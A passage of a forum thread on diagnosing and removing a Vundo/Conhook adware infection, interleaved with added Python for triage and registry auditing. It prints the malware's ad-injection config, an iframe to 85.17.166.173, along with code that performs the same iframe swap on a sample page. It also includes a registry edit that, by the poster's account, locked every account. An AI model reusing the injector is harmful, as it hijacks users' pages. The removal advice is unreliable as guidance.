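</initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a7b91358' name='a7b91358' src='http://85.17.166.173/go/?cmp=nm_bm3s_300x250&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='300' height='250'></iframe>]]></new_value></new_values>
</action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN>
</CAMPAIGNLIST><COOKIES><COOKIE>ip=ODcuNjAuOTYuOTA#</COOKIE><COOKIE>country=REs#</COOKIE><COOKIE>network=Ym0#</COOKIE></COOKIES></ROOT>"""

# Constructed page (not from the thread): two 300x250 slots written in the two
# styles the config matches, and one 468x60 slot the 300x250 campaign ignores.
SAMPLE_PAGE = """<html><body>
<div class="ad"><iframe src="http://ads.example.test/show?ord=1" width="300" height="250" frameborder="0"></iframe></div>
<div class="ad"><iframe src="http://ads.example.test/show?ord=2;sz=300x250;pos=top" frameborder="0"></iframe></div>
<div class="ad"><iframe src="http://ads.example.test/show?ord=3" width="468" height="60"></iframe></div>
</body></html>"""


def load_campaigns(xml_text):
    """Turn each <CAMPAIGN> into its name, compiled match patterns, replacement and match budget."""
    campaigns = []
    for camp in ET.fromstring(xml_text).iter("CAMPAIGN"):
        campaigns.append({
            "name": camp.get("name"),
            # The config's patterns are written case-insensitively and span the
            # whole <IFRAME>...</IFRAME> element, hence IGNORECASE | DOTALL.
            "patterns": [re.compile(iv.text, re.IGNORECASE | re.DOTALL)
                         for iv in camp.iter("initial_value")],
            "replacement": camp.find(".//new_value").text,
            "limit": int(camp.find("./options/option[@name='count']").get("value")),
        })
    return campaigns


def rewrite_page(html, campaigns, page_url, uid="0", guid="0", aid="0"):
    """Apply every campaign to a page; returns (rewritten html, {campaign name: replacements})."""
    hits = {}
    for camp in campaigns:
        injected = (camp["replacement"]
                    .replace("[uid]", uid).replace("[guid]", guid)
                    .replace("[aid]", aid).replace("[url]", page_url))
        remaining = camp["limit"]  # the <option name="count"> budget
        for pat in camp["patterns"]:
            if remaining <= 0:
                break
            # Callable replacement, so nothing in the ad tag is read as a backreference.
            html, n = pat.subn(lambda _m: injected, html, count=remaining)
            remaining -= n
            if n:
                hits[camp["name"]] = hits.get(camp["name"], 0) + n
    return html, hits


def decode_cookies(xml_text):
    """The COOKIES block is base64 with '#' written in place of '=' padding."""
    cookies = {}
    for c in ET.fromstring(xml_text).iter("COOKIE"):
        key, _, value = c.text.partition("=")
        cookies[key] = base64.b64decode(value.replace("#", "=")).decode("ascii")
    return cookies


if __name__ == "__main__":
    camps = load_campaigns(CAMPAIGN_XML)
    page, hits = rewrite_page(SAMPLE_PAGE, camps, "http://example.test/")
    print(hits)                          # {'300x250': 2}
    print(decode_cookies(CAMPAIGN_XML))  # {'ip': '87.60.96.90', 'country': 'DK', 'network': 'bm'}
```

Both 300x250 slots end up pointing at 85.17.166.173 while the 468x60 slot is untouched, which is exactly the "half loaded" look of a page whose ad frames have been swapped. The decoded cookies show the machine's public IP and country already recorded in the config, so the file is worth keeping as evidence before deleting it.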
 
IndiGenus Commented:
Certainly looks like Vundo/Conhook Trojan to me...

Download and Run ComboFix (by sUBs)

http://download.bleepingcomputer.com/sUBs/ComboFix.exe

Disable your Anti-virus and any real-time Anti-spyware monitors that are running.
Then double click Combofix.exe & follow the prompts.
When finished, it will produce a log for you. Upload that log in your next reply with a new HijackThis log.  

Please do not post the log into the comment window. Use "Attach File" under the comment window to post the log.

Note 1: Do not mouse-click ComboFix's window while it is running; that may cause it to stall.
Note 2: Remember to re-enable your anti-virus and anti-spyware.

NOTE: If you have issues connecting to your network or the internet after running ComboFix, you can either simply reboot, or do the following:
* Go to Control Panel > Network Connections.
* Right-click on your network icon and select "Repair".
or
Alternatively, if the Network icon appears in the notification area in the lower right corner of the desktop, right-click it, and then click Repair from the shortcut menu.

PLEASE ALSO NOTE: ComboFix will typically fix most, and sometimes all, malware entries, but many times a script is also needed to finish cleaning up. So please keep CF until advised whether you need the script or not.
0
 
rhythmluvr Commented:
Avast Antivirus Home Edition (free) has a great feature: during the install it will ask whether you would like to perform a pre-boot scan of your system. During the next reboot it will scan your system before it fully loads the operating system. I have used this to get rid of stubborn malware that other programs will not remove. I have installed this program with other antivirus already on the system; it will warn you that it found another AV program, but once the pre-scan has been performed you can remove it.

It is the only software I have seen with this feature.
0
 
chilternPC Commented:
Once you have cleared this problem (I use Spybot myself, from here:
http://www.safer-networking.org/en/index.html, and the free Windows Defender from microsnot).

To stop persistent malware: do not let teenagers use the PC; do not click on links in email; do not visit dodgy sites (those enticing adverts or pop-ups: always click the red cross); do not use P2P software such as LimeWire, BitTorrent or BearShare;
do not click on links in MSN Messenger.
0
 
rpggamergirl Commented:
The absence of the O2 and O20 lines in HijackThis is the sign of a Vundo/Conhook infection, so I agree with IndiGenus that running ComboFix is a good idea, and in any case bad files showing in the log can be removed using its CFScript function.

The IP address that's showing there looks very much like a Wareout infection, and so does the symptom you mentioned, so I think it could also be a Wareout infection.

Try running FixWareout also.
Please download FixWareout from one of these sites:
http://downloads.subratam.org/Fixwareout.exe
http://download.bleepingcomputer.com/lonny/Fixwareout.exe

Save it to your desktop and run it. Click Next, then Install, then make sure "Run fixit" is checked and click Finish. The fix will begin; follow the prompts. You will be asked to reboot your computer; please do so. Your system may take longer than usual to load; this is normal.

At the end of the fix, you may need to restart your computer again.
0
 
orangutang Commented:
Also, run SUPERAntiSpyware (http://www.superantispyware.com/downloadfile.html?productid=SUPERANTISPYWAREFREE) and remove:
O4 - HKLM\..\Run: [BM870dc8a8] Rundll32.exe "C:\WINDOWS\system32\sslnpilc.dll",s
0
 
steve0412 Author Commented:
I have come to this conclusion, after I discovered a Zatacka icon on the desktop of a user:

Zatacka is a popular arcade-type game. It is available for download from reliable sources such as SourceForge (http://zatacka.sourceforge.net/index.php?id=authors).

My 15-year-old daughter enjoys this game, but one day she wanted to play it on another PC here, so she downloaded it, from an unreliable source it seems. Zatacka.exe was a 46 KB exe file that installed to the desktop. After she found that nothing happened when she tried to start it, she tried to remove it, but she could not.

At about the same time, we started to get a lot of pop-ups from partypoker, statcounter, tradedoubler, 2o7, Clickxchange, Linksynergy, advanced, bizadverts, dk.advancedcleaner, secure.advancedcleaner and zedo. At the same time, it seems, the trojan Vundo was installed.

The mechanism seems to be that an XML file, BM870dc8a8, is installed in the Windows directory and run on starting a browser. This came to our attention when web pages stopped loading completely. This XML file calls rundll32.exe, which runs DLLs installed in system32 (with names such as 'djshrhsg.dll').

If you use HijackThis or StartupMonitor to remove the command from the HKLM Run section, it immediately clones itself.

The way to remove it is to start Windows in Safe Mode with Command Prompt and use the 'DEL' command.

McAfee Security Suite, SpyHunter 3, SpyEraser and RogueRemover Pro did not detect this problem.

Has anyone heard of this before, and do you think I have nailed the problem?

0
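The Run-key entry steve0412 describes (a value named BM870dc8a8 launching Rundll32.exe with a random-named DLL out of system32) can be picked out of a HijackThis log automatically rather than by eye. The Python below is an added example, not code from the thread or from any of the tools it mentions. It reads the O4 lines copied from the log posted in the question, plus one constructed benign rundll32 line (NvCplDaemon, which is not in the posted log, added for contrast), flags entries by two heuristics (an 8-letter machine-looking DLL stem and a BM + 8 hex digit value name, both tuned to the names in this thread), and prints the cmd.exe lines that would delete the value and the file. The function names and thresholds are mine.

```python
import os
import re

# O4 lines copied from the HijackThis log in the question, plus the NvCplDaemon
# line, a constructed benign rundll32 entry that is NOT in the posted log.
SAMPLE_LOG = r"""
O4 - HKLM\..\Run: [DLA] C:\WINDOWS\System32\DLA\DLACTRLW.EXE
O4 - HKLM\..\Run: [MskAgentexe] C:\Programmer\McAfee\MSK\MskAgent.exe
O4 - HKLM\..\Run: [SiteAdvisor] C:\Programmer\SiteAdvisor\6253\SiteAdv.exe
O4 - HKLM\..\Run: [Run StartupMonitor] StartupMonitor.exe
O4 - HKLM\..\Run: [Spyhunter Security Suite] "C:\Programmer\Enigma Software Group\SpyHunter\SpyHunter3.exe" -minimized
O4 - HKLM\..\Run: [BM870dc8a8] Rundll32.exe "C:\WINDOWS\system32\sslnpilc.dll",s
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOKAL TJENESTE')
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Programmer\Adobe\Acrobat 7.0\Reader\reader_sl.exe
"""

# "O4 - <hive>\..\<key>: [<value name>] <command>"; Global Startup lines do not match.
O4_RE = re.compile(r"^O4 - (?P<hive>HK[A-Z]+(?:\\[^\\]+)?)\\\.\.\\(?P<key>Run\w*): \[(?P<name>[^\]]*)\] (?P<cmd>.*)$")
USER_SUFFIX_RE = re.compile(r"\s*\(User '[^']*'\)$")
# rundll32[.exe] <dll>[,<export>], with or without a path and quotes.
RUNDLL_RE = re.compile(r'^"?(?:[A-Za-z]:\\[^"]*?\\)?rundll32(?:\.exe)?"?\s+"?(?P<dll>[^",]+)"?(?:,(?P<export>\S*))?', re.I)
BM_NAME_RE = re.compile(r"BM[0-9a-f]{8}")
VOWELS = "aeiouy"


def looks_random(stem):
    """Heuristic for the 8-letter generated DLL names seen in this thread
    (sslnpilc, djshrhsg): all letters, and either at most one vowel or a run
    of four or more consonants. Kept narrow so ctfmon / mskagent pass."""
    s = stem.lower()
    if len(s) != 8 or not s.isalpha():
        return False
    vowels = sum(ch in VOWELS for ch in s)
    longest_consonant_run = max(len(run) for run in re.split("[%s]+" % VOWELS, s))
    return vowels <= 1 or longest_consonant_run >= 4


def triage_o4(log_text):
    """Return the Run-key entries that look like the loader in this thread, with reasons."""
    findings = []
    for line in log_text.splitlines():
        m = O4_RE.match(line.strip())
        if not m:
            continue
        cmd = USER_SUFFIX_RE.sub("", m["cmd"])
        reasons, dll = [], None
        r = RUNDLL_RE.match(cmd)
        if r:
            dll = r["dll"].strip()
            stem = os.path.splitext(os.path.basename(dll.replace("\\", "/")))[0]
            if looks_random(stem):
                reasons.append("rundll32 loads %s (export %r) and the DLL name looks machine-generated"
                               % (dll, r["export"]))
        if BM_NAME_RE.fullmatch(m["name"]):
            reasons.append("value name is BM + 8 hex digits, the same scheme as the BM870dc8a8 XML config")
        if reasons:
            findings.append({"hive": m["hive"], "key": m["key"], "name": m["name"],
                             "cmd": cmd, "dll": dll, "reasons": reasons})
    return findings


def cleanup_commands(findings):
    """cmd.exe lines for Safe Mode with Command Prompt: remove the Run value, then the DLL."""
    cmds = []
    for f in findings:
        hive = f["hive"].replace("HKUS", "HKU", 1)  # HijackThis writes HKUS for HKEY_USERS
        cmds.append('reg delete "%s\\Software\\Microsoft\\Windows\\CurrentVersion\\%s" /v "%s" /f'
                    % (hive, f["key"], f["name"]))
        if f["dll"]:
            cmds.append('del /f /a "%s"' % f["dll"])
    return cmds


if __name__ == "__main__":
    found = triage_o4(SAMPLE_LOG)
    for f in found:
        print(f["name"], "->", "; ".join(f["reasons"]))
    print("\n".join(cleanup_commands(found)))
```

Run the printed commands from Safe Mode with Command Prompt, as steve0412 did with DEL, because the thread reports the value being recreated as soon as it is removed from a live session. The name heuristic is a triage aid tuned to this thread, not proof of infection, and it only sees what is wired into a Run key: the CFScript later in the thread lists a dozen such DLLs on this machine, so one hit still calls for a full scan.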
 
chilternPC Commented:
The best way to 'nail the problem' for the future is limited or no accounts for children!! (Or even better, their own PCs.) :-)
0
 
IndiGenus Commented:
Yes, we have heard of it. It is the Vundo/Conhook Trojan and is (unfortunately) very common these days. ComboFix and typically a follow-up script with it deal with it very nicely. There is even a new variant that infects .exe files, causing start-up programs to fail. CF would have also dealt with this nicely.

Dave
0
 
steve0412Author Commented:
Ralph Nader once wrote a book "Unsafe at Any Speed: The Designed-In Dangers of the American Automobile". There should be one called "Unsafe at Any Speed: The Designed-In Dangers of the Internet".
0
 
IndiGenusCommented:
Sorry, forgot to mention... no way for us to know if you solved the problem. Have the issues disappeared?

0
 
steve0412Author Commented:
The problem is solved, but I figure that I got there myself. However, I am grateful for the good advice, so I will split the points.
0
 
steve0412Author Commented:
I spoke too soon. Opened another user profile and bang! There it is again. I am running ComboFix now, but am worried by an instruction conflict in swreg.cfexe. I have clicked through and CF is scanning.
0
 
steve0412Author Commented:
Please see log and comment?
log.txt
0
 
IndiGenusCommented:
Heavily infected machine...had a "feeling" you would be back, or have to make another post. Give me a little and I'll put a CFScript together for you if you like.

0
 
IndiGenusCommented:
1. Open Notepad.

2. Now copy/paste the text between the lines below into the Notepad window:

---------------------------------------------------------------------------------------------------------------

File::
C:\WINDOWS\system32\bxxogiao.pest
C:\WINDOWS\system32\sslnpilc.pest
C:\WINDOWS\system32\qcsqhaif.pest
C:\WINDOWS\BM870dc8a8.xml
C:\WINDOWS\system32\djjhkdec.pest
C:\WINDOWS\system32\tryjvick.pest
C:\WINDOWS\BM870dc8a8crap2.xml
C:\WINDOWS\system32\lhpyevon.pest
C:\WINDOWS\system32\wecswpwi.pst
C:\WINDOWS\system32\fqrhbddy.pest
C:\WINDOWS\system32\tynlomju.pest
C:\WINDOWS\BM870dc8a8crap.xml
C:\WINDOWS\system32\adubyivx.pest
C:\WINDOWS\system32\ivlrtwlu.pest
C:\WINDOWS\system32\eqqgqcix.pest
C:\WINDOWS\system32\gocjemjp.pest
C:\WINDOWS\system32\gntwwwhr.pest
C:\WINDOWS\system32\pacrbsma.pest
C:\WINDOWS\system32\lfweeymi.pest
C:\WINDOWS\system32\dsfkbpgr.pest
C:\WINDOWS\system32\icxujaoj.pest
C:\WINDOWS\system32\kaprwtgk.pest
C:\WINDOWS\system32\pgtxwmij.pest
C:\WINDOWS\system32\iikfvcsp.pest
C:\WINDOWS\system32\hesrnwym.pest
C:\WINDOWS\system32\lljrmkln.pest
C:\WINDOWS\system32\nomnvppa.pest
C:\WINDOWS\system32\jbbmbeig.pest
C:\WINDOWS\system32\ncprincn.pest
C:\WINDOWS\system32\eocymiir.pest
C:\WINDOWS\system32\ffmhrwss.pest
C:\WINDOWS\system32\qjitcugg.pest
C:\WINDOWS\system32\sardsvqh.pest
C:\WINDOWS\system32\iifggff.dll
C:\WINDOWS\system32\mljgh.dll

Registry::
[-HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\iifggff]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"Authentication Packages"=hex(7):6d,73,76,31,5f,30,00,00

---------------------------------------------------------------------------------------------------------------

3. Save the above as CFScript.txt on your desktop.

4. Then drag the CFScript.txt into ComboFix.exe. This will start ComboFix again.

5. After reboot, (in case it asks to reboot), please upload the following reports/logs.

-Combofix.txt
-A new HijackThis log ~ From each user account
0
 
steve0412Author Commented:
Before I do that, please be aware that these files have been renamed by me. They were .dll files. Shall I perform the task anyway or should I rename them back to .dll?
0
 
steve0412Author Commented:
Actually, it is self-explanatory, so I will perform the task 'as is'.
0
 
IndiGenusCommented:
Yes just to confirm "as is". They are all Vundo files. I thought one of the security programs you tried may have renamed them but the extension did look a little funny...

0
 
steve0412Author Commented:
Hi

I followed instructions but nothing happened, so I tried to run combofix and copy the CFScript.txt to the blue window. It has not removed the files. I am including the log, script and 5 hijackthis log files.

NB. I had MS Process Explorer installed on this PC. Has combofix removed it?
hijackthis-profile1ap.txt
hijackthis-profile2cp.txt
hijackthis-profile3sp.txt
hijackthis-profile4sm.txt
hijackthis-profile5guest.txt
ComboFix.txt
CFScript.txt
0
 
steve0412Author Commented:
Just a comment (not really to do with the problem in hand, but anyway)
Considering that we are talking about removing pests, it amazes me that by opening experts-exchange, adware pests namely adtech, tribalfusion and e2.emediate cookies are placed on my PC!
0
 
IndiGenusCommented:
The script didn't run because you are not running combofix from the desktop. Combofix needs to be put directly on the desktop. Do the same with the script .txt file. Then drag the txt file onto CF... that should do it. Then post the logs...
0
 
steve0412Author Commented:
Combofix is on the desktop, not a shortcut, but where it was installed. If I drag the file in (also on the desktop), the loading bar starts, a flash of blue screen then nothing (how long do I wait? 20 minutes?)
0
 
rpggamergirlCommented:
Combofix instructions say to run it from the desktop, maybe because that's easier, but even if it wasn't, the CFScript still should work as long as it's in the same location as Combofix.exe. Just wait and let it run, even for 20 minutes.


>>>Considering that we are talking about removing pests, it amazes me that by opening experts-exchange, adware pests namely adtech, tribalfusion and e2.emediate cookies are placed on my PC!<<<

Tribal Fusion feeds the advertising for EE, and of course EE gets paid for displaying these ads on their pages, but Premium members don't have these ads.
0
 
IndiGenusCommented:
Forgive my ignorance on this...

This is where cf is located:

C:\Documents and Settings\Anne\Skrivebord\ComboFix.exe

What is Skrivebord? Is it another language for desktop?
0
 
rpggamergirlCommented:
I think Norwegian Windows XP Desktop is called --> Skrivebord, :)

And "Escritorio" in Spanish
C:\Documents and Settings\Owner\Escritorio\ComboFix.exe
0
 
IndiGenusCommented:
From your HijackThis logs...this is the only entry I'm seeing as bad. Looks like it's at least partly fixed. You can have Hijackthis fix the item.

O20 - Winlogon Notify: iifggff - iifggff.dll (file missing)

See if that helps.
0
 
steve0412Author Commented:
No luck with dropping the script file on the icon. It starts, but no log is produced, and the files are still there. Can I remove the files manually?
0
 
IndiGenusCommented:
Yes, you can remove the files manually, but there is one registry entry that still is bad.

This, which is bad...
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa]
Authentication Packages      REG_MULTI_SZ         msv1_0 C:\WINDOWS\system32\mljgh.dll

Should be this..
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"Authentication Packages"=hex(7):6d,73,76,31,5f,30,00,00

If you are comfortable editing the registry you can do it manually.
0
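The two registry locations this thread keeps returning to, the HKLM Run value that launches a DLL through Rundll32.exe (the O4 line above) and the LSA "Authentication Packages" REG_MULTI_SZ that should hold only msv1_0, can both be audited from an exported .reg file without touching the live registry. The following is my own added example, not code from IndiGenus, ComboFix or HijackThis. It decodes the hex(7) byte list shown in the CFScript and in this post, flags any package other than msv1_0, and flags any Run entry that starts a DLL via rundll32. The samples are constructed: they reproduce the BM870dc8a8 and mljgh.dll entries named in the thread in REGEDIT4 (ANSI) export form, and "ExampleBenignApp" is an invented placeholder for a normal autostart entry.

```python
"""Audit exported .reg text for the two persistence points discussed in this thread."""
import re

RUN_KEYS = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
)
LSA_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"
ALLOWED_AUTH_PACKAGES = {"msv1_0"}   # Windows XP default: only the NTLM package
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+\.dll)"?', re.IGNORECASE)


def parse_reg(reg_text):
    """Parse exported .reg text into {key: {value name: raw data}}.
    Joins regedit's backslash-continued hex lines back into one value."""
    tree, current, pending = {}, None, ""
    for line in reg_text.splitlines():
        line = pending + line.strip() if pending else line.rstrip()
        pending = ""
        if line.endswith("\\"):          # continuation: keep collecting
            pending = line[:-1]
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            tree.setdefault(current, {})
        elif current is not None:
            m = re.match(r'^"([^"]+)"=(.*)$', line)
            if m:
                tree[current][m.group(1)] = m.group(2)
    return tree


def values_of(tree, key):
    """Case-insensitive key lookup, as the registry itself is case-insensitive."""
    for k, vals in tree.items():
        if k.lower() == key.lower():
            return vals
    return {}


def unquote_reg_sz(data):
    """Undo .reg escaping of a REG_SZ field: outer quotes, \\" and \\\\ escapes."""
    if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
        data = data[1:-1]
    return data.replace('\\"', '"').replace("\\\\", "\\")


def decode_multi_sz(hex7):
    """Decode a REGEDIT4-style hex(7) value (ANSI bytes, NUL-separated strings,
    double-NUL terminated). 6d,73,76,31,5f,30,00,00 decodes to ['msv1_0']."""
    body = hex7.strip()
    if not body.lower().startswith("hex(7):"):
        raise ValueError("not a hex(7) REG_MULTI_SZ value")
    body = re.sub(r"[\\\s]", "", body[len("hex(7):"):])   # drop stray continuations
    raw = bytes(int(o, 16) for o in body.split(",") if o)
    return [part.decode("latin-1") for part in raw.split(b"\x00") if part]


def audit_run_rundll32(reg_text):
    """Return (key, value name, DLL path) for each Run entry that starts a DLL via
    rundll32, the shape of the O4 line in this thread. Legitimate software rarely
    autostarts this way, so every hit deserves a look at the DLL's signer and age."""
    tree, hits = parse_reg(reg_text), []
    for key in RUN_KEYS:
        for name, data in values_of(tree, key).items():
            m = RUNDLL_RE.search(unquote_reg_sz(data))
            if m:
                hits.append((key, name, m.group(1)))
    return hits


def audit_authentication_packages(reg_text):
    """Return every LSA 'Authentication Packages' entry other than msv1_0. Anything
    listed there is loaded into lsass.exe at boot, which is how mljgh.dll survived."""
    data = values_of(parse_reg(reg_text), LSA_KEY).get("Authentication Packages")
    if data is None:
        return []
    return [p for p in decode_multi_sz(data) if p.lower() not in ALLOWED_AUTH_PACKAGES]


# Constructed sample reproducing the infected state described in the thread;
# ExampleBenignApp is an invented placeholder for a normal autostart entry.
INFECTED_REG = r'''REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BM870dc8a8"="Rundll32.exe \"C:\\WINDOWS\\system32\\sslnpilc.dll\",s"
"ExampleBenignApp"="\"C:\\Program Files\\Example\\app.exe\""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"Authentication Packages"=hex(7):6d,73,76,31,5f,30,00,43,3a,5c,57,49,4e,44,4f,57,\
  53,5c,73,79,73,74,65,6d,33,32,5c,6d,6c,6a,67,68,2e,64,6c,6c,00,00
'''

# Constructed sample of the same two keys after the fix described above.
CLEAN_REG = r'''REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ExampleBenignApp"="\"C:\\Program Files\\Example\\app.exe\""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"Authentication Packages"=hex(7):6d,73,76,31,5f,30,00,00
'''
```

The 8-byte value in the CFScript tells you the script is in REGEDIT4 (ANSI) form; a file exported by regedit on XP with the "Windows Registry Editor Version 5.00" header stores hex(7) as UTF-16LE, so for such an export decode the bytes with "utf-16-le" and split on double-NUL at even offsets instead. Read-only auditing like this is also the safe first step before the manual edit discussed further down: confirm what the value actually contains on that machine before changing it, and export the key first so it can be restored.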
 
steve0412Author Commented:
No, I wouldn't know unless it is to replace the current text with the string provided, but I am sure it is not. Is it still a REG_MULTI_SZ? Or do I enter the string in binary? Sorry about the lack of knowledge in this department, but I don't want to screw the registry up!!!
0
 
IndiGenusCommented:
First you should back up your registry, especially if you're not comfortable with editing it.

You are going to go to the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa key.
When you navigate to "Authentication Packages" under the name heading in your registry, it will be:

Type: REG_MULTI_SZ
Data: msv1_0
0
 
steve0412Author Commented:
Ok, is this a bad joke?

I did as instructed and now Windows is asking me for a log in password for all the accounts on that PC. As no password was set, I am at a loss what to do. I have tried 'administrator' with no avail.

Please advise.
0
 
steve0412Author Commented:
OK, I have recovered the system from the 'last known good etc.'. That was one helluva change in the registry! Now, what do I have to do to the user accounts to make the registry change and not have the same problem of totally locked down accounts?
0
 
IndiGenusCommented:
OK? I'm confused on several things here.

1. You are saying that last registry change made this happen?
2. Did you make a backup of the registry before doing the change as I had advised? If so you could have just reverted to that.

That change if done properly should not have caused that to happen and I'm not sure what's going on here.

If you went to Last Known Good Configuration then it should have just brought you back to where you were before.

Is this an English version of XP, or another language? I had commented about the Skrivebord (Desktop) earlier. I'm wondering if that had something to do with it.
0
 
steve0412Author Commented:
1. Yes, because the only thing changed in the registry was changing the entry as proposed.

2. Yes, I did, and that is why I could recover.

This is Danish XP. When I tried to log on, including the administrator account in Safe mode, it said that I had limited permission. Since I don't run with passwords on that PC (yes - I know - stupid!) there were no passwords to enter. I tried 'admin', 'administrator', 'password'.

0
 
IndiGenusCommented:
I cannot say for sure, but since this PC is Danish maybe the reg entry would be different??? I obviously really only deal with US, as you can tell by the fact that I didn't know what "Skrivebord" meant.

Maybe rpg will look in here with a suggestion.
0
 
steve0412Author Commented:
There is still the point of the change in the registry, which blocked access to the user accounts. This may be an issue with language versions (Danish) of Windows XP. I would like to know that I have fully removed the threat and that I am protected in the future.
0